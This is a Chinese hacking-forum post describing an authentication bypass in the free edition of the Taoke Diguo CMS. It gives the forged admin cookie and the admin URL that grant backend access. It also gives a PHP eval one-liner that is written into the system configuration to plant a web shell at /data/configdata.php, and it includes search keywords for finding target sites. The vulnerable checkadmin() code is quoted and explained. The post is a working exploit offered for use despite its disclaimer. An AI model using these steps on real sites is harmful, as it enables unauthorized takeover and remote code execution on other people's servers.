黑帽联盟

 找回密码
 会员注册
查看: 1532|回复: 0
打印 上一主题 下一主题

[系统安全] 客帝国cms系统后台cookie欺骗漏洞及后台拿shell

[复制链接]
yun 黑帽联盟官方人员 

920

主题

37

听众

1364

积分

超级版主

Rank: 8Rank: 8

  • TA的每日心情
    奋斗
    2019-10-18 11:20
  • 签到天数: 678 天

    [LV.9]以坛为家II

    淘客帝国免费版的后台可以cookie欺骗,以下文章只做技术讨论,切勿做任何违法事情,否则后果自负


    工具: 老兵的cookie’欺骗工具

    关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品


    首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..


    补下代码【anfli 补】
    getshell 简单 系统配置 {${@eval($_POST[‘cmd’])}} 一句话连接地址/data/configdata.php
    顺便补一下代码===================|The End}
    ##admin目录下php 部验证##
    ——————–main.php
    <?php
    require_once ‘../include/adminfunction.php’;
    checkadmin();
    ———————/include/sysfunction.php
    #####

    function checkadmin(){
    global $COOKIEadminuser;
    global $sitetitleurl;


    //判断
    if( (isset($_COOKIE[‘COOKIEadminuser’]) && $_COOKIE[‘COOKIEadminuser’]!=””) || (isset($_SESSION[‘adminuser’]) && $_SESSION[‘adminuser’]!=””) ){
    } else {
    echo(“<script language=’JavaScript’>;top.location.href='”.$sitetitleurl.”‘;</script&gt;”);
    exit;
    }

    一看就懂
    $_COOKIE[‘COOKIEadminuser’]!=”” 只要不为空就ok
    //index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 ………COOKIEadminuser是干神马的?/admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空
    if($action==”loginout”){
    $_SESSION[‘adminuser’] = “”;
    SetCookie(“adminuser”, “”);
    redirect_to($sitetitleurl);


    其实所有审计过程 是倒序



    帖子永久地址: 

    黑帽联盟 - 论坛版权1、本主题所有言论和图片纯属会员个人意见,与本论坛立场无关
    2、本站所有主题由该帖子作者发表,该帖子作者与黑帽联盟享有帖子相关版权
    3、其他单位或个人使用、转载或引用本文时必须同时征得该帖子作者和黑帽联盟的同意
    4、帖子作者须承担一切因本文发表而直接或间接导致的民事或刑事法律责任
    5、本帖部分内容转载自其它媒体,但并不代表本站赞同其观点和对其真实性负责
    6、如本帖侵犯到任何版权问题,请立即告知本站,本站将及时予与删除并致以最深的歉意
    7、黑帽联盟管理员和版主有权不事先通知发贴者而删除本文

    您需要登录后才可以回帖 登录 | 会员注册

    发布主题 !fastreply! 收藏帖子 返回列表 搜索
    回顶部